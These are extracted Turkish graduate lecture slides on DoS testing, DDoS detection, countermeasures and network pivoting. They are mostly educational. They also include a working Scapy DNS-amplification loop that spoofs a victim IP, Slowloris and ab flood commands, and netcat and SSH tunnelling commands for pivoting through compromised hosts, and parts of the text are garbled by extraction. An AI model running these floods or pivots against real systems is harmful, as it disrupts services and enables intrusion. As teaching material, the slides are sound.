12 - Servis Dıs¸ı Bırakma Testleri - PivotingDDoS Saldırıları (Devam) DDoS Saldırı Algılama Kars¸ı Onlemler¨ BotNet Kars¸ı Onlemler¨ DDoS Pentest Pivoting Kanallar

DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar

12 - Servis Dışı Bırakma Testleri - PivotingBGM 531 - Sızma Testleri ve Güvenlik Denetlemeleri

Bilgi Güvenliği MühendisliğiYüksek Lisans Programı

Dr. Ferhat Özgür Ç[email protected]

İstanbul Şehir Üniversitesi2018 - Güz

Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting


İçindekiler

1 DDoS Saldırıları (Devam)SYN Flood - MetasploitDNS AmplificationDNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı

2 DDoS Saldırı AlgılamaGirişActive ProfilingSequential Change-PointDalgacık Analizi

3 Karşı ÖnlemlerKarşı ÖnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıEgress FilteringIngress FilteringTCP InterceptHoneypots

Load-Balancing4 BotNet Karşı Önlemler

RFC 3704 FiltrelemeGelişmiş Koruma AraçlarıKarşı Önlemler

5 DDoS PentestDDoS PentestGelişmiş DDoS Koruma Yöntemi

6 PivotingRoutingPivotingKullanılan Pivoting KanallarıAraçlar

7 KanallarNetcat relaySSH Lokal Port YönlendirmeSSH Ters Port YönlendirmeSSH Dinamik Port YönlendirmeMeterpreter Sessions



SYN Flood - Metasploit

SYN Flood

I RHOST: Hedef adresI RPORT: Hedef port

I SHOST: Kaynak IP adresi,(spoofable)



DNS Amplification I

DNS AmplificationI Yansıtma (Reflection) saldırısıdır. Kurban adresi kullanılarak IP spoofing.I Sorgu paketleri yaklaşık 60 byte, cevap paketleri 3-4 kbyte (x50-70)I Saldırgan, hedef A kaydı için kurban kaynak adresine sahip bir DNS

isteği gönderir.



DNS Amplification II

Şekil: DNS Amplification 1



DNS Amplification III

Şekil: Spamhouse DDoS Saldırısı 2

1http://blog.sflow.com/2013/10/dns-amplification-attacks.html2https://blog.cloudflare.com/the-ddos-that-knocked-spamhaus-offline-and-ho/



DNS Amplification - Scapy I

#!/usr/bin/pythonfrom scapy.all import *victimIP = "192.168.4.46"dnsIP = "8.8.8.8"while True:

send(IP(dst=dnsIP,src=victimIP)/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname="www.sehir.edu.tr")),verbose=0)



HTTP GET Seli I

HTTP GET SeliI Sahte olmayan IP adresleri ile bir veya birden fazla makineden eş

zamanlı olarak istek gönderilmesi.I Web sunucusuna veya uygulamaya saldırmak için görünürde meşru olan

HTTP GET veya POST isteklerini kullandığı (DDoS) saldırısı.I Kullanılan araçlar

I Apache JMeter (Load testing)I AB: Apache HTTP server benchmarking tool

Listing 1: Apache Benchmark HTTP GET Seli

$ ab -n 10000 -c 500 http://www.google.com/

-c Bağlantı sayısı (concurrency)

-n İstek sayısı (requests)



HTTP GET Seli II



HTTP GET Seli III



HTTP GET Seli IV



Slowloris I

Slowloris/SlowHTTPI Diğer flood saldırı yöntemlerinden farklıI Birden fazla bağlatı açarI Açılan bağlantıları olabildiğince uzun şekilde açık tutmaya çalışır.I Tamamlanmayan HTTP istekleri gönderir. Hiçbir zaman tam döngü

olmazI Sunucunun ”maximum concurrent connection pool” doldurmaya çalışır.

How use Slowloris

Requirements:# sudo apt-get update# sudo apt-get install perl# sudo apt-get install libwww-mechanize-shell-perl# sudo apt-get install perl-mechanize



Slowloris II

1)Download slowloris.pl2)Open Terminal2)# cd /thePathToYourSlowloris.plFile3)# ./slowloris.pl4)# perl slowloris.pl -dns (Victim URL or IP) -options



Slowloris III



Slowloris IV



Slowloris V

$ apachectl status...

CPU Usage: u2.18 s.2 cu0 cs0 - .27% CPU load

.817 requests/sec - 11.1 kB/second - 13.5 kB/request

131 requests currently being processed, 2 idle workers

very low CPU usage, a lot of Apache processes, very few new requests/s.

$ ps aux | grep httpd | wc -l113

Slowloris works by making more and more requests, until it reaches yourApache’s MaxClients limit.



Slowloris VI

Listing 2: Apache 2.4

$ tail -f /var/log/httpd/error.log...[mpm_prefork:error] [pid 7724] AH00161: server reachedMaxRequestWorkers setting, consider raising theMaxRequestWorkers setting

Listing 3: Apache 2.2

$ tail -f /var/log/httpd/error.log...[error] server reached MaxClients setting, considerraising the MaxClients setting



Slowloris VII



Slowloris VIII



Lab

LabI DDoS-1 Payload ve Payload olmadan paket gönderimi

I time curl -I http://192.168.1.1 | grep HTTPI Wireshark Graph I/O

I DDoS-2 DNS AmplificationI Wireshark



İçindekiler











Giriş

DDoS Saldırı AlgılamaI DDoS saldırılarını algılama yöntemleri genel olarak, daha önce trafik paternlerinin

(desenlerinin) izlenmesine dayanır.I Trafik izlenerek, patern üzerinde meydana gelen beklenmeyen değişiklikler

gözlemlenir.I illegal trafik

I Saldırı: normal ve beklenen trafik üzerinde meydana gelen anormal ve dikkatçekici olan sapmalar.

I Kullanılan teknik:I Hizmet kesintiye uğramadan algılamalı.I Hızlı şekilde cevap vermeli.I False-positive oranı düşük olmalı.

I Kullanılan yöntemler:I Activity Profile I Sequential Change point I Wavelet analysis

I Bütün teknikler, normal ağ trafik istatistiklerinin belirli bir eşik değerinden sapmasıolarak bulunur.



Active Profiling

Active ProfilingI Activity profile: Belirli bir zaman süresi (örnek 1 sn) içerisinde ağ

içerisinde gelen paket, istek sayısıI Paket başlık bilgileri kullanılır.

I ProtokolI Src/Dst IPI Src/Dst Port

I Benzer özelliklere sahip olan istekler farklı kümelere ayrılır.I Activity level: Bir kümede yer alan network flow’larının sayısı bize o

kümenin aktivite sayısını verir. (Belirli bir süre dahilinde)I Activity level içerisinde meydana gelecek artış bize bir DDoS

olabileceğinin sinyalini verir.



Active Profiling - Backscatter Analysis Project

Backscatter Analysis Project3

I Amaç: DDoS aktivitesini algılamak.I Saldırganlar kaynak IP adres sahtekarlığı (src IP spoofing) yapar,I Kurban, spoof edilmiş adrese cevap gönderdir.I Paketler geri yayılırlar (backscattered)I Bu çalışmada geri-yayılan (backscattered) paketler, kaynak IP

adreslerine göre (kurban) kümelenir.I her bir küme içerisinde aktivite seviyesi, gönderdiği paketlerde yer alan

IP adreslerinin değeridir.

3Moore, David, et al. Inferring internet denial-of-service activity. ACM Transactions on Computer Systems (TOCS) 24.2 (2006):115-139.



Active Profiling - Activity Level DDoS Detection I

Activity Level DDoS Detection4

I IP başlıklarında yer alan bazı bilgilerinin entropy ve ki-kare (chi-square)dağılımları hesaplanarak ulaşılmaktadır.

I Entropy (Information Theory): Düzensizliğin ölçüsü, n adet bağımsızdeğişken ve herbirinin seçilme olasılığı pi olsun; H = −

∑ni=1 pi log2 pi

I Kümeler, en çok görünen kaynak IP adreslerine göre ayrılır.I Kume1: 1 IP adresi.I Kume2: 4 IP adresi.I Kume3: 256 IP adresi.

I Kume4: 4096 IP adresi.

I Kumen : Geri kalan bütün kaynak IP adresleri



Active Profiling - Activity Level DDoS Detection II

Paketler aynı IP adresi üzerinden geldiği zaman entropy değeri düşük,farklılaşma olduğu zaman entropy değeri yüksek.

4Feinstein, Laura, et al. ”Statistical approaches to DDoS attack detection and response.” DARPA Information Survivability Conferenceand Exposition, 2003. Proceedings. Vol. 1. IEEE, 2003.



Sequential Change-Point Detection I

Sequential Change-Point DetectionI Yöntem genel olarak saldırılar sonucunda trafik istatistiğinde meydana gelen ani değişimleri

algılar.I Hedef Bilgisayar, hedef port, haberleşme protokolüne göre filtreleme yapar.I Ağ trafiğini zaman-serisi şeklinde saklar.I Ağ akış oranında herhangi bir değişiklik olduğunda bunu bilgilendirir.I CUSUM sürekli veriler üzerinde çalışan bir değişim noktası tespit algoritmasıdır.

I Eşik değeri seçimine göre false-positive veya algılama gecikmesi yaşanabilir.

xn: samples from a process (packet size), ω: weight (trend), h: threshold

g0 = 0, gt = max(0, gt−1 + xn + ω) ifgt ≥ h then alarm and gt = 0 (1)



Sequential Change-Point Detection II

Şekil: DDos Saldırısı5



Sequential Change-Point Detection III

5Wang, Shangguang, et al. ”Detecting SYN flooding attacks based on traffic prediction.” Security and Communication Networks 5.10(2012): 1131-1140.



Dalgacık Analizi (Wavelet Analysis)

Time-frequency representation of a continuous signal.

Şekil: Dalgacık Analizi 6

6http://groups.geni.net/geni/wiki/FirstGenBrooksDr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting


İçindekiler











Karşı Önlemler

Karşı ÖnlemlerI Saldırının absorbe edilmesiI Servis hizmetinin azaltılmasıI Hizmetin kapatılması



Saldırıyı Absorbe Etmek

Saldırıyı Absorbe EtmekI Ek kapasiteye ihtiyaç duyulur.I Daha önceden planlama ve çözümün gerçekleştirilmiş olması gerekir.I Kapasitenin eklenmesiyle ilgili doğrudan ve devam eden maliyetlerin

bilincinde olmamız gerekirI computing, storage, network equipment, standby servers, replication of data



Servis Hizmetinin Azaltılması

Servis Hizmetinin AzaltılmasıI Saldırı esnasında bütün servislerin ayakta ve çalışır halde olması

gerekmeyebilir.I Kritik işletme fonksiyonlarını yerine getiren bilişim sistemleri

değerlendirilmeliI Bunların DoS saldırısına karşı korunması için strateji belirlenmelidir.I Sunulan hizmetlerden alt kümeler oluşacak şekilde (örn: kritik servisler)



Hizmetin Kapatılması

Hizmetin KapatılmasıI Zarar, kontrolün ötesine geçtiğinde, tüm servisleri planlı bir şekilde

kapatmak ve ardından aşamalı bir şekilde normale dönmek en iyisidir.I Tüm saldırılara karşı koruma sağlamak için kolay bir yol veya tek bir yol

yoktur.



Egress Filtering

Egress FilteringI Ağdan ayrılan IP paket üstbilgileri geçerli kriterleri karşılayıp

karşılamadıklarını kontrol etmek için taranır.I Kriterleri karşılayan paketlerin ağın dışına çıkmasına izin verilecektirI Sahte IP adresleri bulunan birçok DDoS paketi iptal edilir.I Yetkisiz veya kötü niyetli trafiğin ev ağından ayrılmasına izin vermez.



Ingress Filtering

Ingress FilteringI Tanım: gelen paketlerin aslında kaynak olduklarını iddia eden ağlardan

geldiğine emin olmak için kullanılan bir tekniktir.I Paketler ağ’ınız içerisine alınmadan önce doğru olmayan adreslere

sahiplerse, bunları filtreleyin.I Meşru (legitimate) kaynak IP

I Bilinen IP adreslerinden gelen saldırıları engellemez.I Saldırganın sahte kaynak IP adreslerinden saldırı başlatmasını yasaklar.I Bu filtreleme, kaynak adresi izlememize yardımcı olur.



Ingress - Egress Filtering

Şekil: Ingress - Egress Filtering 7

7http://1100029f.blogspot.com.tr/2012/04/ccd2c01-p02-1100029f.htmlDr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting


TCP Intercept I

TCP InterceptI TCP sunucularını SYN flood saldırılarından korumak için tasarlanmıştır.I TCP Intercept yazılımları, istemci tarafından gönderilen SYN paketlerini

keser, eğer istemci erişim listesinde (access list) yer alırsa bağlantıyı izinverir.

I Aynı şekilde sunucu ile istemcinin yerine iletişime geçer bağlantıkurulduktan sonra aradan çekilir.

I Sahte istemci bağlantı isteklerinin sunucuya ulaşmasını engeller.



TCP Intercept II

Şekil: TCP Intercept 8

8http://flylib.com/books/en/2.464.1.51/1/Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting


Honeypots

HoneypotsI Honeypots: Sahte bilgisayar sistemleri

I Yem olarak kurulurlarI Saldırganlar hakkında bilgi toplamak için kullanılır.

I Sınırlı güvenlik ayarlarına sahip sistemlerI Saldırganı çekmekI Footprint tanımakI Ana Sunucuyu korumak

I Saldırganların dikkatini ana sunucu yerine bunlara yönlendirmek içinkullanılır.

I Saldırı yöntemleri, teknikleri vb. hakkında yeterli bilginin eldeedilebilmesi için ana sunucuların hemen hemen tüm özelliklerine sahipolmalı.



Honeypots Türleri I

High interaction honeypotsI Gerçek zafiyet içeren hizmetler

ve yazılımlar içerir.I Gerçek işletim sistemleri ve

uygulamalar içerirler.I Saldırının, sızma saldırısının

veya zararlı yazılımın gerçekortamda nasıl çalışacağınaulaşılır.

I Honeynets: tuzak da dahilolmak üzere tüm bilgisayarağının tüm düzenini içerenaltyapıdır ve saldırı ayrıntılarınıyakalarlar.I http://project.honeynet.org



Honeypots Türleri II

Low interaction honeypotsI Saldırgan veya zararlı yazılımla

kısıtlı etkileşime girenlerI sunulan bütün servisler taklit

(emulate) edilir.I Kendisi zafiyet içermemekte,

dolayısıyla sömürüler (exploits)sonucunda enfekte olmayacaktır.



Load-Balancing

Load-Balancing

I İşi, iki ya da daha fazla bilgisayar, işlemci, sabit disk ya da diğerkaynaklar arasında paylaştırma teknolojisidir. 9

I En iyi kaynak kullanımı, en yüksek işlem hacmi, en düşük cevap süresisağlanabilir; oluşabilecek aşırı yüklemeden(overload) kurtulunabilir.

9https://tr.wikipedia.org/wiki/Yuk dengelemeDr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting


DDoS’a Karşı Çözümler (SANS)

Leveraging the Load Balancer toFight DDoSI https://www.sans.org/reading-

room/whitepapers/firewalls/leveraging-load-balancer-fight-ddos-33408

I Günümüzde görülen DDoSsaldırılarının, web ortamında yeralan load-balancer teknolojilerikullanarak nasıl giderilebileceğinianlatmaktadır.



İçindekiler











RFC 3704 Filtreleme

RFC 3704 FiltrelemeI RFC 3704: Ingress Filtering for Multihomed Networks (filter at the ISP

before enters the Internet link.)I Black hole filtering (Discarding packets at the routing level)

I Gelen veya giden trafiğin silindiği (veya ”düştüğü”) ağdaki yerleri ifade eder,kaynağa verilerin hedeflenen alıcıya ulaşmadığına dair bilgi vermez.

I Servis sağlayıcılar tarafından genellikle erişim listeleri uygulanmadan trafikfiltrelemesi için kullanılan bir tekniktir.

I Örnekler: ”packets destined to 192.168.1.1 are discarded”, ”Disable ICMPunreachable packets”



Gelişmiş Koruma Araçları

Araçlar

I DDoS ProtectorI FortiDDoS appliancesI Arbor Pravail Availability

Protection SystemI Cisco Guard XT

I WanguardI SDL Regex FuzzerI NetFlow AnalyzerI Netscaler application firewallI AntiDDoS Guardian



Karşı Önlemler

Karşı ÖnlemlerI Disable unused and insecure servicesI Update kernel to the latest releaseI Deny external ICMP traffic accessI



İçindekiler











DDoS Pentest I

1 Pentest’in amacı ve planını tanımlayın2 Sunucu veya uygulama üzerinde yapay istekler oluşturarak yük testi

(load test) gerçekleştirinI Webserver Stress Tool, Web Stress Tester, JMeter

3 Ağı tarayarak DoS açıklarını kontrol edin. Nmap, GFI LANGuard veyaNessus gibi araçları kullanabilirsiniz.

4 Hedefi bağlantı istek paketleriyle boğarak sunucuda SYN saldırısı yapın.Araçlar: DoS HTTP, Sprut

5 Sunucu üzerine çok sayıda TCP veya UDP paket göndererek ”portflooding” saldırısı yapın. Araçlar: Pepsi5, Mutilate



DDoS Pentest II

6 E-posta sunucusunda, e-posta bombardımanı çalıştırın. Araçlar: MailBomber, Advanced Mail Bomber

7 Web sitesi formlarını ve ziyaretçi defterini keyfi ve uzun girdilerikullanarak sahte girişlerle doldurun.

8 Son olarak, tüm bulguları belgeleyin ve belirlenen sorunların çözümündebir sonraki adımları başlatın.



Gelişmiş DDoS Koruma Yöntemi

Gelişmiş DDoS Koruma Yöntemi

1 Ağ ortamını değerlendirin ve bir savunma planı gerçekleştirin2 Kapsamlı ve katmanlı bir DDoS stratejisi geliştirin3 Altyapı (infrastructure) düzeyinde kontrol uygulayın4 DNS sunucularını ve diğer kritik altyapıyı koruyun5 Kurum içi özel DDoS araçları uygulayın



İçindekiler











Routing I

RoutingI Defense-in-Depth: Hizmetleri koruyabilmek için çok katmanlı güvenlik

mimarileri geliştirilmektedir.I Kritik sistemler (veritabanı, uygulama sunucusu gibi) yer aldığı ağ, diğer

sistemlerin bulunduğu ağ üzerinde olmamalıdır.I Routing: Farklı ağ üzerinde bulunan cihazların nasıl haberleşeceği

belirleyen süreç



Routing II

Şekil: Routing

Bir ağ paketinin ilerlemesi aşağıdaki gibidir:I IP adresi yerel ağda üzerinde mi?

I Eğer öyleyse,hedefe ulaşır

I Değilse, ağ

geçidinegönder

I Yönlendirici (router) paketi aldığında,kendi yönlendirme tablosuna (routingtable) bakar

I Hedef IP adresi veya hedef ağ içinbir yönlendirme kuralı var mı?

I Evet ise, paketi hedefeyönlendir

I Değilse, ağ geçidine gönderI Aynı işlem diğer yönlendiricilerde de

tekrarlanır.I Paket nihayet kurumun internet çıkışından

sorumlu yönlendiriciye ulaşır. Ve paketinternete gönderilir.



Routing III

Pivoting:I Temel olarak, ele geçirilmiş bilgisayarları kullanarak normal şartlar

altında erişemediğimiz ağlara erişme süreciI Birden fazla ağa erişimi olan bir bilgisayarın ele geçirilmesi durumunda

ağ izolasyonu işe yaramaz.I Bu yöntemle, ele geçirilen bilgisayarlar ile yönlendirme yapan bir

saldırgan gizli ağlara erişebilir. Yeni keşfedilen ağa yapılacak her istekPivot üzerinden iletilir.



Routing IV

Şekil: Routing 10

10https://pentest.blog/explore-hidden-networks-with-double-pivoting/Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting


Pivoting I

Örnek SenaryoI Sladırgan IP adresi: 192.168.1.104I Compromised Windows XP: 192.168.1.131 ve 10.128.0.3.I Saldırgan 10.128.0.x ağını tarar ve IP 10.128.0.1 (Linux) keşfeder.I IP 10.128.0.1 (Linux) doğrudan saldırgan tarafından erişilebilir değildir,

ancak yine de ”Pivot” tekniğiyle saldırılabilinir.



Kullanılan Pivoting Kanalları

Kullanılan KanallarI Netcat relaysI SSH local port forwardingI SSH dynamic port forwarding (SOCKS proxy)I Meterpreter sessionsI Ncat HTTP proxy



Kullanılan Araçlar

Araçlar

I NmapI ProxychainsI Netcat

I NcatI Web BrowserI Metasploit



İçindekiler











Netcat relay I

Listing 4: Netcat relay$mknod backpipe p$nc -l -p 12700 0backpipe

Netcat RelaysI 12700. port üzerinde bir Netcat listener oluşturur.

I -l listen for an incoming connection rather than initiate a connection to aremote host

I Listener gelen bütün trafiği tubitak.gov.tr adresi ve 80 porta yönlendirilir.I mknod: ”character/block device” oluşturma için kullanılır.

I -p: for fifo (pipe).



Netcat relay II



Netcat relay III

Şekil: Tarayıcı Görünümü



Netcat relay IV

Şekil: Banner Grabbing



Netcat relay V

Şekil: Netcat relay, banner grabbing Wireshark çıktısı



Netcat relay VI

Eksik taraflarI Netcat relay yöntemi, HTTP trafiği için çok uygun değil.

I HTTP isteği tamamlandığı zaman, Netcat relay çalışmasını durdurur.

I Bir döngü kullanılarak Netcat’in yeniden başlatılması şeklinde bir çözümyapılabilir.



SSH Local Port Forwarding I

Local Port Forwarding

I Belli bir sunucuyla bağlantıya izin vermeyen özel bir ağ üzerindeolduğumuzu kabul edeilim.

I google.com engelleniyor olsun.I Ağımızda olmayan ve dolayısıyla google.com’a erişebilen bir sunucu

üzerinden bir tünel oluşturabilir.

Listing 5: SSH lokal port yönlendirme

$ssh -L 12700:google.com:80 [email protected]



SSH Local Port Forwarding II

$ssh -L port:destination_host:destination_portusername@pivot_host

Komut satırıI port : dinlemede olan lokal portI destination host : hedef IP adresi veya hostnameI destination port : hedef sunucuda dinlemede olan portI username: pivot sunucuda yer alan kullanıcı adıI pivot host : pivot sunucunun IP adresi veya hostname



SSH Local Port Forwarding III

Şekil: SSH lokal port yönlendirme



SSH Local Port Forwarding IV




SSH Local Port Forwarding V




SSH Local Port Forwarding VI




Firewall Arkasında Yer Alan Veritabanına Bağlanmak I

Database Behind FirewallI localhost (127.0.0.1) üzerinden erişilebilen fakat uzaktan erişilemeyen

portlara erişim.

Şekil: MySQL tunel bağlantısı



Firewall Arkasında Yer Alan Veritabanına Bağlanmak II

Şekil: MySQL tunel bağlantısı



Firewall Arkasında Yer Alan Veritabanına Bağlanmak III

Şekil: MySQL lokal port fwd Pcap görüntüsü



Firewall Arkasında Yer Alan Veritabanına Bağlanmak IV

Şekil: MySQL-Workbench kullanıcı bağlantıları



Firewall Arkasında Yer Alan Veritabanına Bağlanmak V

Şekil: NMap port versiyon taraması



Firewall Arkasında Yer Alan Veritabanına Bağlanmak VI

Şekil: Nmap MySQL Enum betiği



Firewall Arkasında Yer Alan Veritabanına Bağlanmak VII

Şekil: Nmap MySQL Brute betiği



SSH Ters Port Yönlendirme I

Şekil: Kurban tarafı ters ssh yönlendirme

Şekil: Saldırgan tarafı ters ssh yönlendirme



SSH Ters Port Yönlendirme II

Local vs RemoteI ssh -L port:host:hostport : lokal makinede port ’u dinler, uzak makinenin

satırında ”host:hostport” trafiğini gönderir.I ssh -R port:host:hostport : uzak makinede port ’u dinler, lokal makinenin

satırında ”host:hostport” trafiğini gönderir.



SSH Dinamik Port Yönlendirme (Socks Proxy) I

SSH Dinamik Port YönlendirmeI SSH istemcisi ve SSH sunucusu arasında güvenli kanal oluşturur.

Listing 6: Dinamik Port komut satırı (saldırgan tarafı)

$ssh -D address:port username@pivot_host



SSH Dinamik Port Yönlendirme (Socks Proxy) II



SSH Dinamik Port Yönlendirme (Socks Proxy) III

Şekil: Saldırgan tarafı dinamik port yönlendirme

Şekil: İstemci tarafı dinamik port yönlendirme



SSH Dinamik Port Yönlendirme (Socks Proxy) IV

Şekil: İstemci tarafı proxy tanımlama



SSH Dinamik Port Yönlendirme (Socks Proxy) V

Şekil: İstemci tarafı web tarayıcı



SSH Dinamik Port Yönlendirme (Socks Proxy) VI

Şekil: Sunucu tarafı paket trafiği



Meterpreter Sessions I

Meterpreter SessionsI Metasploit, tünelleme için farklı bileşenlere sahiptir.I Metasploit route komutu diğer ağlara sıçrama yapılabilir.I Bu şekilde metasploit üzerinde yer alan exploitler diğer ağ’lar üzerinde

kullanılabilir hale gelir.



Meterpreter Sessions II



Meterpreter Sessions III



Meterpreter Sessions IV



Meterpreter Sessions V



Meterpreter Sessions VI



Meterpreter Sessions VII



Lab

LabI Netcat relay

mknod backpipe pnc -l -p12700 0backpipe

I Local Port Forwarding (Attacker)I (Web)

ssh -L 12700:tubitak.gov.tr:80 [email protected] (MySQL)

ssh -L 12700:localhost:3306 [email protected] (NMap)

nmap -sS -sV -p12700 10.0.2.4

I Reverse ShellI (Victim) ssh -R 12700:localhost:3306 [email protected] MySQL Client Connection 12700


DDoS Saldırıları (Devam)SYN Flood - MetasploitDNS AmplificationDNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı

DDoS Saldırı AlgılamaGirisActive ProfilingSequential Change-PointDalgacık Analizi

Karsı ÖnlemlerKarsı ÖnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıEgress FilteringIngress FilteringTCP InterceptHoneypotsLoad-Balancing

BotNet Karsı ÖnlemlerRFC 3704 FiltrelemeGelismis Koruma AraçlarıKarsı Önlemler

DDoS PentestDDoS PentestGelismis DDoS Koruma Yöntemi

PivotingRoutingPivotingKullanılan Pivoting KanallarıAraçlar

KanallarNetcat relaySSH Lokal Port YönlendirmeSSH Ters Port YönlendirmeSSH Dinamik Port YönlendirmeMeterpreter Sessions

Documents

12 - Servis Dıs¸ı Bırakma Testleri - PivotingDDoS Saldırıları (Devam) DDoS Saldırı Algılama Kars¸ı Onlemler¨ BotNet Kars¸ı Onlemler¨ DDoS Pentest Pivoting Kanallar